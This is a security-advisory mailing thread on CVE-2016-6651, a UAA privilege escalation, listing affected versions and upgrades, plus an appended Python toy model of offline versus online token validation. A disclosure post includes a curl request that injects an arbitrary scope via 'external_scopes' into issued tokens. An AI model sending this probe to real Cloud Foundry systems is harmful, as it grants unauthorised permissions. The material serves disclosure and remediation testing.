Re: [HIGH] CVE-2016-6651: Privilege Escalation in UAA

Timothy Hausler


CC uses offline validation so that it does not have to talk to the UAA for
every request. Right now there is no way to configure CC to use online


On Mon, Sep 26, 2016 at 12:17 PM, Mike Youngstrom <youngm(a)> wrote:

Anyone know off hand if CC uses online or offline validation? If
configurable, what config would we look for to know if it is online or


On Mon, Sep 26, 2016 at 12:58 PM, Molly Crowther <mcrowther(a)> wrote:

Hello all,

In the interest of full public disclosure, the CFF Security Team would
also like to share some additional information about this vulnerability
that will aid in testing and remediation. Please let us know if you have
any questions or concerns.

Molly Crowther
Cloud Foundry Foundation Security Team

Description of Vulnerability

The vulnerability exposes an untested parameter that lets any application
add arbitrary scopes (permissions) to an access token.

curl <> \
  -H "Accept: Application/json" \
  -u "cf:" \
  -d "username=<username here>" \
  -d "password=<password here>" \
  -d "client_id=cf" \
  -d "grant_type=password" \
  -d "response_type=token" \
  -d "external_scopes=cloud_controller.test"

A vulnerable system will return the following response:

{
  "access_token": "redacted for readability",
  "expires_in": 599,
  "jti": "redacted for readability",
  "refresh_token": "redacted for readability",
  "scope": "openid … cloud_controller.test",
  "token_type": "bearer"
}

cloud_controller.test is an arbitrary string, but may as well be

Applications that perform offline validation will happily accept the
inserted string as a permission. Applications that use online validation,
i.e. the /check_token UAA API endpoint, are not vulnerable: the
UAA validates the permissions against what's in the database (uaadb).

A patched system will ignore the external_scopes parameter completely,
and cloud_controller.test will not be returned in the response.

On Mon, Sep 26, 2016 at 11:23 AM, Molly Crowther <mcrowther(a)> wrote:

CVE-2016-6651: Privilege Escalation in UAA

Vendor

Cloud Foundry Foundation
Versions Affected


Cloud Foundry release v242 and earlier versions

UAA release v3.7.0 & earlier versions

UAA bosh release (uaa-release) v16 & earlier versions


Description

A privilege escalation vulnerability has been identified with the
/oauth/token endpoint in UAA allowing users to elevate the privileges in
the token issued.

Mitigation

OSS users are strongly encouraged to follow one of the mitigations below:


Upgrade to Cloud Foundry v243 [1] or later

For standalone UAA users

For users using UAA Version 3.0.0 - 3.7.0, please upgrade UAA
Release to v3.7.3 [2], v3.4.5 [3] or v3.3.0.6 [4]

For users using standalone UAA Version 2.X.X, please upgrade UAA
Release to v2.7.4.8 [5]

For users using the UAA bosh release, please upgrade UAA-Release to
v17 [6] if upgrading to v3.7.3 [2], v12.6 [7] if upgrading to v3.4.5 [3], or
v11.7 [8] if upgrading to v3.3.0.6 [4]


Credit

SAP HCP Security Team

History

2016-09-26: Initial vulnerability report published
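The offline-versus-online distinction discussed in the thread, as an added example in Python (not UAA or Cloud Controller code): a toy issuer that models the unpatched and patched behaviour of the /oauth/token password grant, an offline validator that checks the signature and trusts the scope claim, and an online validator that also checks the scope against a stand-in for uaadb. HS256 with a constructed key replaces the UAA's RSA signing key, the user table and every scope name other than cloud_controller.test are constructed, and response_shows_injected_scope is a hypothetical helper for reading the curl response shown earlier in the thread.

```python
"""Toy model of CVE-2016-6651: why offline token validation accepts the
injected scope and an online /check_token-style check does not. Added
example, not UAA or Cloud Controller code; HS256 with a constructed key
stands in for the UAA's RSA-signed JWTs and a dict stands in for uaadb."""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

SIGNING_KEY = b"constructed-demo-signing-key"  # stand-in for the UAA signing key
UAADB_USER_SCOPES = {  # constructed stand-in for the scopes granted in uaadb
    "alice": {"openid", "cloud_controller.read", "cloud_controller.write"},
}
INJECTED_SCOPE = "cloud_controller.test"  # the arbitrary string from the thread


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_jwt(claims: dict) -> str:
    """Issuer-side signing: whatever the issuer puts in the claims, bogus
    scopes included, comes out under a valid signature."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(claims, sort_keys=True).encode())
    mac = hmac.new(SIGNING_KEY, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(mac)}"

def verify_jwt(token: str) -> Optional[dict]:
    """Signature and expiry check; returns the claims or None. This is all an
    offline validator can do: it cannot tell a granted scope from one the
    issuer should never have signed."""
    try:
        header, body, sig = token.split(".")
        mac = hmac.new(SIGNING_KEY, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(mac, _b64url_decode(sig)):
            return None
        claims = json.loads(_b64url_decode(body))
    except ValueError:  # wrong part count, bad base64 or bad JSON
        return None
    return None if claims.get("exp", 0) <= time.time() else claims

def issue_token(username: str, external_scopes: Optional[str], patched: bool) -> str:
    """Model of the password grant at /oauth/token. Unpatched, external_scopes
    is merged into the scope claim unchecked; patched, the parameter is ignored."""
    scopes = set(UAADB_USER_SCOPES[username])
    if external_scopes and not patched:
        scopes |= set(external_scopes.split())
    return sign_jwt({"user_name": username, "scope": sorted(scopes),
                     "exp": int(time.time()) + 599})

def validate_offline(token: str, required_scope: str) -> bool:
    """CC-style check: verify the signature locally and trust the scope claim."""
    claims = verify_jwt(token)
    return claims is not None and required_scope in claims.get("scope", [])

def validate_online(token: str, required_scope: str) -> bool:
    """/check_token-style check: the scope must also be one uaadb grants the user."""
    claims = verify_jwt(token)
    if claims is None:
        return False
    granted = UAADB_USER_SCOPES.get(claims.get("user_name"), set())
    return required_scope in claims.get("scope", []) and required_scope in granted

def forge_scope_without_key(token: str, extra_scope: str) -> str:
    """Attacker edits the scope claim without the key: offline validation rejects
    this, which is why the bug needs the UAA to sign the bogus scope itself."""
    header, body, sig = token.split(".")
    claims = json.loads(_b64url_decode(body))
    claims["scope"] = sorted(set(claims["scope"]) | {extra_scope})
    return f"{header}.{_b64url(json.dumps(claims, sort_keys=True).encode())}.{sig}"

def response_shows_injected_scope(response_json: str, injected: str = INJECTED_SCOPE) -> bool:
    """Hypothetical helper for the curl probe: True if the /oauth/token response
    body echoes the injected scope, i.e. the UAA is unpatched."""
    return injected in json.loads(response_json).get("scope", "").split()

def run_demo() -> dict:
    """Exercise the cases the thread describes; returns results to assert on."""
    vuln = issue_token("alice", INJECTED_SCOPE, patched=False)
    fixed = issue_token("alice", INJECTED_SCOPE, patched=True)
    return {
        "vuln_offline_accepts": validate_offline(vuln, INJECTED_SCOPE),
        "vuln_online_accepts": validate_online(vuln, INJECTED_SCOPE),
        "patched_offline_accepts": validate_offline(fixed, INJECTED_SCOPE),
        "forged_offline_accepts": validate_offline(
            forge_scope_without_key(fixed, INJECTED_SCOPE), INJECTED_SCOPE),
        "legit_scope_offline": validate_offline(fixed, "cloud_controller.read"),
    }
```

Running run_demo shows the shape of the bug: the unpatched issuer's token passes the offline check for cloud_controller.test but fails the online one, the patched issuer never puts the scope in the token, and the same scope edited into a token without the signing key fails even offline. The weakness is therefore not in the resource server's validation but in the UAA signing a scope it never granted, which is exactly why only consumers that re-check scopes against uaadb (via /check_token) were unaffected. The response helper is the same test as reading the scope field in the curl output by eye.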
